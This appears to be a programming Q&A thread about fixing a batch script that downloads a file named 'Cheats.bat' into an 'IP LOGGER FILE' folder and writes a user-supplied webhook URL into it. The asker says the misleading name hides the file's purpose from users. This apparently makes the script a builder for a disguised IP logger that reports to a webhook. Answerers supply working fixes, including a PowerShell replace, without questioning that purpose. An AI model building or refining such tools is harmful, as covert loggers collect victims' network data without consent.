How do I replace a line in a batch script using one?
Here's the code:
set /p "webhookInput=Webhook Link: "
set "webhookLink=%webhookInput%"

md "IP LOGGER FILE" 2>nul
cd /d "IP LOGGER FILE"
curl -g -k -L -# -o "%cd%\Cheats.bat" "https://www.dropbox.com/<redacted>"

set "file=%cd%\Cheats.bat"
set "_strFind=set "webhook=""
set "_strInsert=set "webhook=%webhookLink%""

set "tempfile=%TEMP%\%file%.tmp"

(for /f "usebackq delims=" %%A in ("%file%") do (
    if "%%A" equ "%_strFind%" (echo %_strInsert%) else (echo %%A)
)) > "%tempfile%"

move /y "%tempfile%" "%file%"

echo.
echo %cd%
echo File created successfully.
pause >nul

Basically it doesn't replace the 2 strings "_strFind" and "_strInsert".
The file doesn't contain any cheats. It's just a name I give every file that the user will not need to see.

I removed the dropbox url to whatever file you're referencing (you should not be sharing real URLs to any of your personal content). Aside from that: there's no specific issue. Please read [ask], as well as how to write a [mcve] with all relevant detail.

@DavidMakogon it's available in the editing history as well as in the answer.

@rotabor - yes it is. And I should have edited it from the answer (which I have now done). And the OP should remove the content or change the permissions, knowing there is now a potential content exposure (same as when accidentally sharing a key). There's only so much I can do...

Here's my test which seemed to work.
@ECHO OFF
SETLOCAL

SET "sourcedir=u:\your files"
SET "destdir=u:\your results"

PUSHD %sourcedir%

set /p "webhookInput=Webhook Link: "
set "webhookLink=%webhookInput%"

md "IP LOGGER FILE" 2>nul
cd /d "IP LOGGER FILE"
rem curl -g -k -L -# -o "%cd%\Cheats.bat" "https://www.dropbox.com/<redactecd>"
COPY /y \cheats.bat cheats.bat >NUL 2>NUL

set "file=%cd%\Cheats.bat"
set "_strFind=set \"webhook=\""
set "_strInsert=set "webhook=%webhookLink%""

set "tempfile=%TEMP%\%file%.tmp"
SET "tempfile=%destdir%\tempfile.txt"

(for /f "usebackq delims=" %%E in ("%file%") do (
 ECHO "%%E"|FINDstr /c:"%_strFind%">NUL 2>NUL 
 IF ERRORLEVEL 1 (echo %%E) ELSE (echo %_strInsert%)
)) > "%tempfile%"

ECHO =====================================

rem move /y "%tempfile%" "%file%"

echo.
echo %cd%
echo File created successfully.

type "%tempfile%"

POPD

GOTO :EOF

Comments:
Established variables and PUSHD/POPD frame to suit my setup.
Copied your cheats.bat to u:\ to suit my setup and avoid running curl.
Since I'm using findstr, escaped " with \ in value assigned to _strfind to suit findstr syntax.
Overrode value assigned to tempfile to suit my system.
I prefer to avoid ADFNPSTXZ (in either case) as metavariables (loop-control variables) as ADFNPSTXZ are also metavariable-modifiers which can lead to difficult-to-find bugs (See for/f from the prompt for documentation). Metavariable changed to E.
Note that for /f will ignore empty lines.
Overwriting of original file suppressed in order that fc /w originalfile generatedfile can be used to observe changes (/w ignores whitespace).
To pre-empt questions arising from cheats.bat,
netstat command specifies %P - should probably be %%P.
IF ERRORLEVEL n is TRUE if the runtime (ie. current) errorlevel is n or greater than n. IF ERRORLEVEL 0 is therefore always true. IF NOT ERRORLEVEL 1 is a test for errorlevel=0. So is IF %ERRORLEVEL%==0, except that the former can be used within a block but the latter cannot.

Did you test it?

Yes. Tested on your cheats.bat. If you have a problem, please state what the problem/s is/are.

I retested your solution, it works. Something failed in my first test.

So, I propose to replace the sophisticated for-if-whatever structure by powershell:
set /p "webhookInput=Webhook Link: "
set "webhookLink=%webhookInput%"

md "IP LOGGER FILE" 2>nul
cd /d "IP LOGGER FILE"
copy /y ..\Cheats.bat Cheats.bat

set "file=Cheats.bat"
set "_strFind=set \"webhook=\""
set "_strInsert=set \"webhook=%webhookLink%\""

set "tempfile=%TEMP%\Cheats.tmp"

powershell -Command "(gc '%file%') -replace '%_strFind%', '%_strInsert%' | Out-File -encoding Unicode '%tempfile%'"

move /y "%tempfile%" "%file%"

echo.
echo %cd%
echo File created successfully.
pause >nul

I tested, it works!
The key moment is to escape the double-quotes in both _strFind and _strInsert.
Test "Cheats.bat"

jkbkjsfd
sdfgvsdgv
sdfrgsdf
set "webhook="
sdrgvsdrg
sdrrgbsdrrgtf
sdrrgfv

To test, create the command file in a working folder. Put there "Cheats.bat". Run cmd then run the command file. Check the resulting "Cheats.bat" in the current folder "IP LOGGER FILE".
